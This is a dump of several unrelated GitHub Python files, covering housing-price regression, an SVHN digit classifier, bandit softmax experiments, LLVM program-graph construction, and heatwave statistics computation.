preprocessing.scale(cityprop['price']),ax=ax[1,1])\n\n\n# In[544]:\n\n\nplot , ax = plt.subplots(2 , 1 , figsize = (25 , 10))\nsns.countplot(x=cityprop[\"City\"],ax=ax[0])\nsns.countplot(x=cityprop[\"type\"],ax=ax[1])\n\n\n# In[545]:\n\n\ncityprop\n\n\n# In[546]:\n\n\ncityprop['Compound']=0\nprop_with_ol['Compound']=0\n\n\n# In[547]:\n\n\ncityprop.loc[(cityprop['location'].str.contains(\"compound\")) | (cityprop['title'].str.contains(\"compound\")),'Compound']=1\ncityprop.loc[(cityprop['location'].str.contains(\"كمبوند\")) | (cityprop['title'].str.contains(\"كمبوند\")),'Compound']=1\n\nprop_with_ol.loc[(prop_with_ol['location'].str.contains(\"compound\")) | (prop_with_ol['title'].str.contains(\"compound\")),'Compound']=1\nprop_with_ol.loc[(prop_with_ol['location'].str.contains(\"كمبوند\")) | (prop_with_ol['title'].str.contains(\"كمبوند\")),'Compound']=1\n\n\n# In[548]:\n\n\ncpd_names=pd.read_excel('compoundlist.xlsx',header=None,names=['Compound_Names'])\ncpd_names.head()\n\n\n# In[549]:\n\n\ncpd_names.Compound_Names=cpd_names.Compound_Names.map(lambda m:m.split(':',1)[0])\ncpd_names.Compound_Names=cpd_names.Compound_Names.map(lambda m:m.lower())\n\n\n# In[550]:\n\n\ns1 = pd.Series(['rehab','tag sultan','gardenia','east town','mountain','madinaty','eastown','park','villette','layan','hyde park','beit al watan','golden square','village gate','fifth square','village gate','katameya heights','swan','dyar','katameya gardens','narges','al banafsag','emar','azzar','sodic'])\ncpd_names=cpd_names.Compound_Names.append(s1, 
ignore_index=True)\ncpd_names.shape\n\n\n# In[551]:\n\n\ncityprop.loc[cityprop['title'].apply(lambda x: any([i in x for i in cpd_names])),'Compound']=1\ncityprop.loc[cityprop['location'].apply(lambda x: any([i in x for i in cpd_names])),'Compound']=1\n\nprop_with_ol.loc[prop_with_ol['title'].apply(lambda x: any([i in x for i in cpd_names])),'Compound']=1\nprop_with_ol.loc[prop_with_ol['location'].apply(lambda x: any([i in x for i in cpd_names])),'Compound']=1\n\n\n# In[552]:\n\n\ncityprop.loc[(cityprop['title'].str.contains(\" in \")) & (cityprop['Compound']==0)].title.map(lambda m:m.split(' in ',1)[1])\n\n\n# In[553]:\n\n\ncityprop.loc[(cityprop['Compound']==0)]\n\n\n# In[554]:\n\n\nsns.set(rc={\"figure.figsize\":(20, 5)})\nsns.countplot(x=cityprop[\"Compound\"])\n\n\n# In[555]:\n\n\nplot , ax = plt.subplots(3 , 1 , figsize = (25 , 13))\nsns.scatterplot(data=cityprop, x=\"size_sqm\", y=\"price\", hue=\"type\",ax=ax[0])\nsns.scatterplot(data=cityprop, x=\"bedroom\", y=\"price\", hue=\"type\",ax=ax[1])\nsns.scatterplot(data=cityprop, x=\"bathroom\", y=\"price\", hue=\"type\",ax=ax[2])\n\n\n# In[556]:\n\n\nfinalprop=cityprop.copy()\nfinalprop=finalprop.drop(['title','location'],axis=1)\nX=finalprop.loc[:, finalprop.columns != 'price']\ny=finalprop['price']\n\n\n# In[557]:\n\n\nprop_with_ol=prop_with_ol.drop(['title','location'],axis=1)\nX_with_ol=prop_with_ol.loc[:, prop_with_ol.columns != 'price']\ny_with_ol=prop_with_ol['price']\n\n\n# In[558]:\n\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nX_dummied=pd.get_dummies(X)\nX_with_ol_dm=pd.get_dummies(X_with_ol)\n\nscaler=MinMaxScaler()\n\ndf_scaled = scaler.fit_transform(X_dummied.to_numpy())\n\nX_sc_dm = pd.DataFrame(df_scaled, columns=X_dummied.columns)\n\nX_with_ol_scaled = scaler.fit_transform(X_with_ol_dm.to_numpy())\nX_with_ol_dm_sc=pd.DataFrame(X_with_ol_scaled, columns=X_with_ol_dm.columns)\n\nprop_dm=X_dummied.copy()\nprop_dm['price']=y\n\nprop_sc_dm=X_sc_dm.copy()\nprop_sc_dm['price']=y\n\n\n# In[559]:\n\n\nsns.set(rc={\"figure.figsize\":(20, 12)})\nsns.heatmap(prop_sc_dm.corr())\n\n\n# In[560]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import linear_model\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_error,mean_squared_error,r2_score\nfrom lightgbm import LGBMRegressor\nfrom sklearn.model_selection import train_test_split\nimport decimal\nimport xgboost as xgb\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\n\ndef predictmodels(clf_A,clf_B,clf_C,X,y,name):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n results = {}\n df = pd.DataFrame()\n for clf in [clf_A, clf_B, clf_C]:\n clf_name = clf.__class__.__name__\n results[clf_name] = {}\n results[clf_name] = clf = clf.fit(X_train, y_train)\n try:\n predictions_test = clf.predict(X_test)\n except:\n predictions_test = clf_A.predict(X_test)\n row={name:decimal.Decimal(r2_score(y_test,predictions_test))}\n rows=[decimal.Decimal(r2_score(y_test,predictions_test))] \n d = {clf_name: row}\n if df.empty:\n df=pd.DataFrame(data=d)\n else:\n df[clf_name]=rows\n return df\n\n\n# Scaled and Dummied/Removed Outliers\n# \n# Using the R2 score Linear models performed an almost identical 0.669 using Linear,Lasso and Polynomial\n\n# 
In[561]:\n\n\ndf=predictmodels(LinearRegression(),linear_model.Lasso(random_state=3),PolynomialFeatures(),X_sc_dm,y,'Scaled/Dummied/Removed Outliers')\nall=df.transpose()\nsns.set_style(\"white\")\n\nplot , ax = plt.subplots(3 , 3 , figsize = (30 , 14))\nsns.pointplot(ax=ax[0,0],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], linestyles=['-'])\nax[0,0].set_title('Scaled/Dummied/Removed Outliers', size=20)\n\n#Scaled and Dummied/Kept Outliers\n\n#Keeping outliers made the Linear Models underperform by a wide margin, from a high 0.669 down to a low score of 0.498\n\ndf1=predictmodels(LinearRegression(),linear_model.Lasso(random_state=3),PolynomialFeatures(),X_with_ol_dm_sc,y_with_ol,'Scaled/Dummied/Kept Outliers')\nedf1=df1.transpose()\nall[edf1.columns[0]]=edf1.iloc[:, 0]\n\nsns.pointplot(ax=ax[0,1],x=list(df1.keys()), y=df1.iloc[0].values, markers=['o'], linestyles=['-'])\nax[0,1].set_title('Scaled/Dummied/Kept Outliers', size=20)\n\n#Dummied Only/Removed Outliers\n\n#Scaling did not make any difference in the Linear Models\n\ndf2=predictmodels(LinearRegression(),linear_model.Lasso(random_state=3),PolynomialFeatures(),X_dummied,y,'Dummied/Removed Outliers')\nedf2=df2.transpose()\nall[edf2.columns[0]]=edf2.iloc[:, 0]\nsns.pointplot(ax=ax[0,2],x=list(df2.keys()), y=df2.iloc[0].values, markers=['o'], linestyles=['-'])\nax[0,2].set_title('Dummied/Removed Outliers', size=20)\n#Scaled and Dummied Without Outliers\n\n#Using Ensemble Methods with scaling, the LGBM Regressor created a slight improvement over the Linear Models with 0.708\ndf=predictmodels(DecisionTreeRegressor(random_state=3),RandomForestRegressor(random_state=3),LGBMRegressor(random_state=3),X_sc_dm,y,'Scaled/Dummied/Removed Outliers')\nsns.pointplot(ax=ax[1,0],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], linestyles=['-'])\nax[1,0].set_ylabel('Score (R2)', size=20, labelpad=12.5)\n\nedf=df.transpose()\ntempdf=edf\n#Scaled and Dummied with Outliers\n\n#Outliers again underperform in the Ensemble Methods, with a large deterioration according to the R2 Score\ndf1=predictmodels(DecisionTreeRegressor(random_state=3),RandomForestRegressor(random_state=3),LGBMRegressor(random_state=3),X_with_ol_dm_sc,y_with_ol,'Scaled/Dummied/Kept Outliers')\nsns.pointplot(ax=ax[1,1],x=list(df1.keys()), y=df1.iloc[0].values, markers=['o'], linestyles=['-'])\nedf1=df1.transpose()\ntempdf[edf1.columns[0]]=edf1.iloc[:, 0]\n#Dummied Only without Outliers\n\n#Scaling made no difference in any of the ensemble methods \n\ndf2=predictmodels(DecisionTreeRegressor(random_state=3),RandomForestRegressor(random_state=3),LGBMRegressor(random_state=3),X_dummied,y,'Dummied/Removed Outliers')\nedf2=df2.transpose()\ntempdf[edf2.columns[0]]=edf2.iloc[:, 0]\nsns.pointplot(ax=ax[1,2],x=list(df2.keys()), y=df2.iloc[0].values, markers=['o'], linestyles=['-'])\nall=pd.concat([all, tempdf])\n\ndf=predictmodels(xgb.XGBRegressor(random_state=3),AdaBoostRegressor(random_state=3),GradientBoostingRegressor(random_state=3),X_sc_dm,y,'Scaled/Dummied/Removed Outliers')\n#Scaled and dummied without outliers\n#Continuing with ensemble methods produced no better results, but a very close one from XGB and an even closer one from GBR\nedf=df.transpose()\ntempdf=edf\nsns.pointplot(ax=ax[2,0],x=list(df.keys()), y=df.iloc[0].values, markers=['o'], 
linestyles=['-'])\n\n\ndf1=predictmodels(xgb.XGBRegressor(random_state=3),AdaBoostRegressor(random_state=3),GradientBoostingRegressor(random_state=3),X_with_ol_dm_sc,y_with_ol,'Scaled/Dummied/Kept Outliers')\nedf1=df1.transpose()\ntempdf[edf1.columns[0]]=edf1.iloc[:, 0]\n#Scaled and Dummied with Outliers\n#Underperforming Outliers\n\nsns.pointplot(ax=ax[2,1],x=list(df1.keys()), y=df1.iloc[0].values, markers=['o'], linestyles=['-'])\n\ndf2=predictmodels(xgb.XGBRegressor(random_state=3),AdaBoostRegressor(random_state=3),GradientBoostingRegressor(random_state=3),X_dummied,y,'Dummied/Removed Outliers')\nedf2=df2.transpose()\ntempdf[edf2.columns[0]]=edf2.iloc[:, 0]\nsns.pointplot(ax=ax[2,2],x=list(df2.keys()), y=df2.iloc[0].values, markers=['o'], linestyles=['-'])\n\n\nall=pd.concat([all, tempdf])\n\n\n# In[562]:\n\n\nall=all.reset_index().rename(columns={'index':'Model'})\n\n\n# In[563]:\n\n\nall.sort_values(by=['Scaled/Dummied/Removed Outliers','Scaled/Dummied/Kept Outliers','Dummied/Removed Outliers'],ascending=False)\n\n\n# We see an obvious positive change in results in all models when outliers were removed\n\n# In[564]:\n\n\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import make_scorer\n\ndef Gridsrch(clf):\n    parameters={'n_estimators':[50,100,200,300,500,1000],'learning_rate':[0.01,0.05,0.1]}\n\n    # MSE is an error metric, so tell the scorer that lower is better\n    scorer=make_scorer(mean_squared_error,greater_is_better=False)\n\n    grid_layout=GridSearchCV(clf,parameters,scoring=scorer)\n\n    grid_fit=grid_layout.fit(X_train,y_train)\n\n    best_clf=grid_fit.best_estimator_\n\n    #predict using plain and optimized model\n    predictions=(clf.fit(X_train,y_train).predict(X_test))\n    best_predictions=best_clf.predict(X_test)\n    print(str(clf) +\" before Optimization: \" + str(mean_squared_error(y_test,predictions)))\n    print(str(clf) +\" after Optimization: \" + str(mean_squared_error(y_test,best_predictions)))\n    print(str(clf) +\" after Optimization R2: \" + str(r2_score(y_test,best_predictions)))\n    print(grid_fit.best_params_)\n    return grid_fit\n\n\n# In[565]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X_sc_dm, y, test_size = 0.2, random_state = 0)\ngrid_fit=Gridsrch(LGBMRegressor(random_state=3))\n\n\n# In[566]:\n\n\ndef plot_grid_search(cv_results, grid_param_1, grid_param_2, name_param_1, name_param_2):\n    scores_mean = cv_results['mean_test_score']\n    scores_mean = np.array(scores_mean).reshape(len(grid_param_2),len(grid_param_1))\n\n    scores_sd = cv_results['std_test_score']\n    scores_sd = np.array(scores_sd).reshape(len(grid_param_2),len(grid_param_1))\n\n    _, ax = plt.subplots(1,1)\n\n    for idx, val in enumerate(grid_param_2):\n        ax.plot(grid_param_1, scores_mean[idx,:], '-o', label= name_param_2 + ': ' + str(val))\n\n    ax.set_title(\"Grid Search Scores\", fontsize=20, fontweight='bold')\n    ax.set_xlabel(name_param_1, fontsize=16)\n    ax.set_ylabel('CV Average Score', fontsize=16)\n    ax.legend(loc=\"best\", fontsize=15)\n    ax.grid('on')\n\n\n# In[567]:\n\n\nplot_grid_search(grid_fit.cv_results_, [50,100,200,300,500,1000], [0.01,0.05,0.1], 'N Estimators', 'Learning Rate')\n\n","repo_name":"Bahaakhalled/Egypt-Cairo-Housing","sub_path":"Notebook.py","file_name":"Notebook.py","file_ext":"py","file_size_in_byte":19284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2070268428","text":"import json\nfrom dataclasses import dataclass\nimport pandas as pd\nimport numpy as np\n\n@dataclass\nclass SpaOutput:\n    dataframe: pd.DataFrame\n    num_warmup_draws: int\n    variable_prefixes_excluded: list[str]\n\ndef 
load_spa_out(sp_out_fname: str):\n    with open(sp_out_fname) as f:\n        sp_out = json.load(f)\n    chains = sp_out['chains']\n    variable_names: list[str] = []\n    for chain in chains:\n        for variable_name in chain['sequences']:\n            if variable_name not in variable_names:\n                variable_names.append(variable_name)\n    variable_names.sort()\n    df = pd.DataFrame(columns=['chain_id', 'draw'] + variable_names)\n    for chain in chains:\n        chain_id = chain['chainId']\n        chain_id_num = int(chain_id.split('_')[-1])\n        variable_values: list[np.ndarray] = []\n        for variable_name in variable_names:\n            if variable_name in chain['sequences']:\n                variable_values.append(np.array(chain['sequences'][variable_name]))\n            else:\n                variable_values.append(np.full_like(variable_values[0], np.nan))\n        num_draws = len(variable_values[0])\n        for draw in range(num_draws):\n            row = [chain_id_num, draw + 1]\n            for variable_value in variable_values:\n                row.append(variable_value[draw])\n            df.loc[len(df)] = row\n    return SpaOutput(\n        dataframe=df,\n        num_warmup_draws=chains[0]['numWarmupDraws'],\n        variable_prefixes_excluded=chains[0]['variablePrefixesExcluded']\n    )","repo_name":"flatironinstitute/stan-playground","sub_path":"devel/sp_utils.py","file_name":"sp_utils.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1074613280","text":"import pandas as pd\nimport numpy as np\nimport time\nfrom evaluate import evaluate,show_metric,compute_tpr_fpr\n\nfile = 'train_cleaned_version4.csv'\ndf = pd.read_csv(file,index_col = 0,nrows = 50000)\n\nmissing_label_df = df[df['label']==-1]\ndf = df[df['label'] != -1]\n\n# df.drop(['date'],axis=1,inplace=True)\n# negative_df = df[df['label']==0]\n# positive_df = df[df['label']==1]\n# subnegative_df = negative_df.sample(n = len(positive_df) * 60)\n# df = positive_df.append(subnegative_df)\n\nfrom train_val_test_split import get_train_val_test_split\ntrain_X, train_y, validation_X, validation_y, test_X, test_y = get_train_val_test_split(df,6,3,1)\n\nfrom sklearn.ensemble import GradientBoostingClassifier\ncv_clf = GradientBoostingClassifier(n_estimators = 250, max_depth=3,tol=0.0001,verbose=10,random_state=10)\ncv_clf.fit(train_X,train_y)\n\ny_true = validation_y\ny_pred = cv_clf.predict_proba(validation_X)[:,1]\nstart = time.time()\nprint(\"evaluation metric: \", evaluate(y_true,y_pred))\nend = time.time()\nprint(end - start, 'seconds')\nshow_metric(y_true,y_pred)\ntpr,fpr = compute_tpr_fpr(validation_y,y_pred)\nprint(\"True positive rate: {}, False positive rate: {}\".format(tpr,fpr))\nprint('*'*60)\n","repo_name":"XinyiYS/import-torch-as-tf","sub_path":"gdbt.py","file_name":"gdbt.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40401364139","text":"import subprocess\nimport tempfile\n\nfrom programl.proto import program_graph_options_pb2, program_graph_pb2\nfrom programl.util.py.runfiles_path import runfiles_path\n\nGRAPH_BUILDER_BIN = runfiles_path(\"programl/programl/ir/llvm/py/graph_builder_bin\")\n\nDefaultOptions = program_graph_options_pb2.ProgramGraphOptions()\n\n\ndef BuildProgramGraph(\n    ir: str,\n    options: program_graph_options_pb2.ProgramGraphOptions = DefaultOptions,\n    timeout: int = 60,\n) -> program_graph_pb2.ProgramGraph:\n    \"\"\"Construct a program graph from an LLVM-IR.\n\n    Args:\n      ir: The text of an LLVM-IR Module.\n      options: The graph construction options.\n      timeout: The number of seconds to permit 
before timing out.\n\n    Returns:\n      A ProgramGraph instance.\n\n    Raises:\n      ValueError: In case graph construction fails.\n      TimeoutError: If timeout is reached.\n      OSError: In case of other error.\n    \"\"\"\n    # Write the ProgramGraphOptions to a temporary file and pass it to a\n    # worker subprocess which generates the graph and produces a ProgramGraph\n    # message on stdout.\n    with tempfile.NamedTemporaryFile(\"w\") as f:\n        f.write(ir)\n        f.flush()\n        options.ir_path = f.name\n        process = subprocess.Popen(\n            [\"timeout\", \"-s9\", str(timeout), str(GRAPH_BUILDER_BIN)],\n            stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE,\n            stdin=subprocess.PIPE,\n        )\n        stdout, stderr = process.communicate(options.SerializeToString())\n\n    proto = program_graph_pb2.ProgramGraph()\n    if process.returncode == 2:\n        raise ValueError(stderr.decode(\"utf-8\").rstrip())\n    elif process.returncode == 9 or process.returncode == -9:\n        raise TimeoutError(f\"Program graph construction exceeded {timeout} seconds\")\n    elif process.returncode:\n        raise OSError(stderr.decode(\"utf-8\").rstrip())\n    proto.ParseFromString(stdout)\n    return proto\n","repo_name":"CGCL-codes/naturalcc","sub_path":"third_party/programl/programl/ir/llvm/py/llvm.py","file_name":"llvm.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"36517224758","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pylab as plt\nimport tensorflow as tf\n\nSEED = 123 # to be able to rerun the same NN\nnp.random.seed(SEED)\ntf.set_random_seed(SEED)\n\nnp.set_printoptions(precision=4, suppress=True, floatmode='fixed')\n\nget_ipython().run_line_magic('matplotlib','inline')\nimport scipy.io as sio\nfrom keras.utils import to_categorical\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Conv2D, MaxPooling2D\nfrom sklearn.metrics import f1_score\n\ndef test(filename):\n    from keras.models import load_model\n    import cv2\n    import matplotlib.pyplot as plt\n    import matplotlib.image as mpimg\n    from scipy.misc import imresize\n    model = load_model('my_model.h5')\n    model.load_weights('my_model_weights.h5')\n    global classes\n    classes = [0,1,2,3,4,5,6,7,8,9]\n    image=filename\n    img_plt=mpimg.imread(image)\n    img=cv2.imread(image)\n    image_size=(32,32)\n    img=imresize(img,image_size)\n    img = np.expand_dims(img, axis=0)\n    arr=model.predict(img)\n    # predict() returns class probabilities, so take the argmax instead of matching 1.0 exactly\n    predicted=classes[int(np.argmax(arr))]\n    print('Predicted Number: %d' % predicted)\n    plt.imshow(img_plt)\n    plt.show()\n    \n    \ndef traintest():\n    \n    import urllib.request\n\n    get_ipython().run_line_magic('mkdir', 'data')\n\n    urllib.request.urlretrieve(\"http://ufldl.stanford.edu/housenumbers/train_32x32.mat\", \"data/train_32x32.mat\")\n    urllib.request.urlretrieve(\"http://ufldl.stanford.edu/housenumbers/test_32x32.mat\", \"data/test_32x32.mat\")\n    urllib.request.urlretrieve(\"http://ufldl.stanford.edu/housenumbers/extra_32x32.mat\", \"data/extra_32x32.mat\")\n\n    train_data = sio.loadmat('data/train_32x32.mat')\n    test_data = sio.loadmat('data/test_32x32.mat')\n    extra_data = sio.loadmat('data/extra_32x32.mat')\n\n\n    X_train, y_train = train_data['X'], train_data['y']\n    X_test, y_test = test_data['X'], test_data['y']\n    X_extra, y_extra = extra_data['X'], extra_data['y']\n\n    global classes\n    classes = [0,1,2,3,4,5,6,7,8,9]\n    nb_classes = 10\n    \n    y_train[y_train == 10] = 0\n    y_test[y_test == 10] = 0\n    y_extra[y_extra == 10] = 
0\n\n    #print(X_train.shape, X_test.shape, X_extra.shape)\n    \n    X_train = np.transpose(X_train,(3,0,1,2))\n    X_test = np.transpose(X_test,(3,0,1,2))\n    X_extra = np.transpose(X_extra,(3,0,1,2))\n\n    X_train = np.concatenate([X_train, X_extra])\n    y_train = np.concatenate([y_train, y_extra])\n\n    X_train = X_train.astype('float32') / 255\n    X_test = X_test.astype('float32') / 255\n\n    y_train = to_categorical(y_train)\n    y_test = to_categorical(y_test)\n    #y_train[:4]\n    \n    model = Sequential()\n\n    model.add(Conv2D(64, kernel_size=(3, 3), activation='relu', input_shape=X_train[0].shape))\n    model.add(MaxPooling2D(pool_size=(2,2)))\n    model.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))\n    model.add(MaxPooling2D(pool_size=(2,2)))\n    model.add(Flatten())\n    model.add(Dense(len(y_train[0]), activation='softmax'))\n\n    model.compile(loss='categorical_crossentropy',\n              optimizer='adadelta', \n              metrics=['accuracy'])\n    \n    #model.summary()\n    model_history = model.fit(X_train, y_train, batch_size=128, epochs=5, validation_split = 0.1)\n    score = model.evaluate(X_test, y_test, verbose=0)\n    print('Test score:', score[0])\n    print('Test accuracy:', score[1])\n    \n    \n    \n    model.save('my_model.h5') # creates a HDF5 file 'my_model.h5'\n    model.save_weights('my_model_weights.h5')\n    \n    y_pred = model.predict(X_test, batch_size=64, verbose=1)\n    y_pred_bool = np.argmax(y_pred,axis=1)\n    # compare against the remapped labels: the raw test labels still encode digit 0 as 10\n    y_true = np.argmax(y_test,axis=1)\n    return f1_score(y_true, y_pred_bool,average='micro')\n","repo_name":"tusharjoshi03/Image-Classification-Using-Convolutional-Neural-Network","sub_path":"svhn.py","file_name":"svhn.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"43892236423","text":"import numpy as np\nfrom random import randint\nfrom numpy.random import choice\nimport matplotlib.pyplot as plt\nimport random\nimport sys\n\nclass Softmax():\n\tdef __init__(self):\n\t\tself.reward_gaussians()\n\n# Initialising the gaussian reward distributions with given mean values and calls the iterator\n\n\tdef reward_gaussians(self):\n\t\tself.arms=[]\n\t\tmeans=[0.2,-0.8,1.55,0.4,1.2,-1.5,-0.1,-1.0,0.8,-0.5]\n\t\tfor i in range(10):\n\t\t\tself.arms.append(np.random.normal(means[i],1,10000))\n\n#Temperature initialisation\n\n\t\ttemp=[0.01,0.1,1]\n\t\tfor count,i in enumerate(temp):\n\t\t\tself.trials(i,count)\n\n# Plotting Section\n\n\t\tplt.ylabel('Average Reward')\n\t\tplt.legend(loc='upper right')\n\t\tplt.xlabel('Steps')\n\t\tplt.title('Softmax')\n\t\tplt.show()\n\n# Softmax Implementation \n\n\tdef softmax(self,Q,Temp):\n\t\tProbability=[]\n\t\tsum=0\n\t\tfor j in range(10):\n\t\t\tsum=sum+np.exp(Q[j]/Temp)\n\t\tfor i in range(10):\n\t\t\tProbability.append(np.exp(Q[i]/Temp)/sum)\n\t\treturn Probability\n\n\n\tdef trials(self,T,counts):\n\t\treward=[0 for i in range(1000)]\n\t\tarms=[i for i in range(10)]\n\n# Loop for averaging over 2000 Bandit Problems\n\n\t\tfor outer in range(2000):\n\t\t\tQ=[0 for i in range(10)]\n\t\t\tcount=[0 for i in range(10)]\n\n# Implementation of 1000 steps\n\n\t\t\tfor inner in range(1000):\t\t\n\t\t\t\tProbability=self.softmax(Q,T)\n\t\t\t\tmaxvalueE=choice(arms,p=Probability)\n\t\t\t\tcount[maxvalueE]=count[maxvalueE]+1\n\t\t\t\tReturn=self.arms[maxvalueE][randint(0,9999)]\n\t\t\t\tQ[maxvalueE]=Q[maxvalueE]+(Return-Q[maxvalueE])/count[maxvalueE]\n\t\t\t\treward[inner]=reward[inner]+Return\n\t\treward=np.array(reward)\n\n# Taking the average reward from 2000 
runs\n\t\t\n\t\treward=reward/2000\n\t\tcolor=['r','g','b']\n\t\tlabel=\"Temp=\"+str(T)\n\t\tplt.plot(reward,color[counts],label=str(label))\n\n\t\t\nif __name__=='__main__':\n\tobj=Softmax()","repo_name":"nivedn3/RL_Assignments","sub_path":"PA1/Softmax.py","file_name":"Softmax.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20413136218","text":"#!/usr/bin/env python3\n\"\"\"\nmodule for task 0\n\"\"\"\n\nimport numpy as np\n\n\ndef uni_bleu(references, sentence):\n \"\"\"\n calculates unigram BLEU score for sentence\n \"\"\"\n sentence_length = len(sentence)\n references_length = []\n words = {}\n for translation in references:\n references_length.append(len(translation))\n for word in translation:\n if word in sentence and word not in words.keys():\n words[word] = 1\n total = sum(words.values())\n index = np.argmin([abs(len(i) - sentence_length) for i in references])\n BLEU = np.exp(1 - float(len(references[index])) / float(sentence_length))\n if sentence_length > len(references[index]):\n BLEU = 1\n return BLEU * np.exp(np.log(total / sentence_length))\n","repo_name":"not-notAlex/holbertonschool-machine_learning","sub_path":"supervised_learning/0x10-nlp_metrics/0-uni_bleu.py","file_name":"0-uni_bleu.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70772515047","text":"import retro\n\nmovie = retro.Movie('SonicTheHedgehog-Genesis-GreenHillZone.Act1-0000.bk2')\nmovie.step()\n\nenv = retro.make(game=movie.get_game(), state=retro.STATE_NONE, use_restricted_actions=retro.ACTIONS_ALL)\nenv.initial_state = movie.get_state()\nenv.reset()\n\nwhile movie.step():\n keys = []\n for i in range(env.NUM_BUTTONS):\n keys.append(movie.get_key(i))\n _obs, _rew, _done, _info = env.step(keys)\n env.render()\n","repo_name":"bijanpuri/ml","sub_path":"retro/playback.py","file_name":"playback.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71513230248","text":"\"\"\"\nSource vertices generator\n\"\"\"\n\nimport random\nfrom typing import List, Union\n\nimport networkx as nx\n\n\ndef select_number_source_verts(num_nodes, n: int, seed: Union[int, None] = None) -> List:\n \"\"\"Return a list of random source vertices in the amount of n\n\n Parameters\n ----------\n graph :\n Initial graph.\n\n n : int\n The number of nodes.\n \n seed : integer, random_state, or None (default)\n Indicator of random number generation state.\n\n Returns\n -------\n l : List\n A random list of nodes in a graph.\n \"\"\" \n if n > num_nodes:\n n = num_nodes\n # raise ValueError(f\"{n} exceeds the number of nodes in a graph ({num_nodes})\")\n \n random.seed(seed)\n\n return random.sample([x for x in range(num_nodes)], n)\n \ndef select_percent_source_verts(num_nodes, p: int, seed: Union[int, None] = None) -> List:\n \"\"\"Return a list of random source vertices in the amount of percent p\n\n Parameters\n ----------\n graph :\n Initial graph.\n\n p : int\n The percent of nodes.\n \n seed : integer, random_state, or None (default)\n Indicator of random number generation state.\n\n Returns\n -------\n l : List\n A random list of nodes in a graph.\n \"\"\"\n return select_number_source_verts(num_nodes, int(num_nodes * p / 100.0), seed)\n\ndef generate_single_source(\n graph\n ) -> List[int]:\n \"\"\"Returns a set of vertices 
for single-source evaluation for the given graph.\n    The size of the generated set depends on the number of nodes in the graph.\n\n    Parameters\n    ----------\n    graph :\n        Graph for which the sample is generated.\n    Returns\n    -------\n    nodes: List[int]\n        The list of sampled node indices for which to evaluate single-source CFPQ.\n    \"\"\"\n    nodes = graph.num_nodes\n    sources = []\n    noderange = 0\n    if nodes < 10000:\n        noderange = nodes\n    elif nodes < 100000:\n        noderange = nodes // 10\n    else:\n        noderange = nodes // 100\n\n    for i in range(noderange):\n        sources.append(random.randrange(0, nodes))\n\n    return sources","repo_name":"bahbyega/paths-benchmark","sub_path":"scripts/gen_chunks.py","file_name":"gen_chunks.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15723223544","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul  5 13:21:43 2022\n\n@author: Pablo G. Zaninelli\n\"\"\"\n\nfrom netCDF4 import Dataset, num2date\nimport pandas as pd\nfrom multiprocessing import Pool\nfrom functools import partial\nimport numpy as np\nfrom HWCompute.preprocess import daymax, daymin, tranCelcius, convertLon, coorobj\nfrom HWCompute.compute_percentile import dayPerc, checkAllNAN, checkAnyNAN\nfrom HWCompute.lib.Heatwave import hwstat\n\n\ndef hw1d(df, q, window, umbral, yStartP, yEndP, lon, lat):\n    assert isinstance(df, pd.core.frame.DataFrame)\n    _reqCol = ['doy', 'temp']\n    colnames = [ii for ii in df.keys()]\n    colnames.sort()\n    if not colnames == _reqCol:\n        raise AttributeError(\"df must have 'doy' and 'temp' columns\")\n    if not np.ma.is_masked(df.temp) and not checkAllNAN(df.temp):\n        perc = dayPerc(df, q, window, yStartP, yEndP)\n        if checkAnyNAN(df.temp):\n            df = df.dropna() # remove NaN values if they exist\n        mat = df.to_numpy()\n        inds, indf, acc, mmean, maxi, mini, max_ex, sum_ex = hwstat(mat,perc, umbral)\n        if not inds.size == 0:\n            tBeginHW, tEndHW = df.index[inds], df.index[indf]\n            DF = pd.DataFrame({'longitude':[float(lon)]*acc.shape[0],\n                           'latitude':[float(lat)]*acc.shape[0],\n                           'start':tBeginHW,\n                           'end':tEndHW,\n                           'accumulated':acc,\n                           'mean':mmean,\n                           'maxtemp':maxi,\n                           'mintemp':mini,\n                           'max_ex':max_ex,\n                           'sum_ex':sum_ex})\n        else:\n            DF = pd.DataFrame({'longitude':float(lon),\n                           'latitude':float(lat),\n                           'start':np.nan,\n                           'end':np.nan,\n                           'accumulated':np.nan,\n                           'mean':np.nan,\n                           'maxtemp':np.nan,\n                           'mintemp':np.nan,\n                           'max_ex':np.nan,\n                           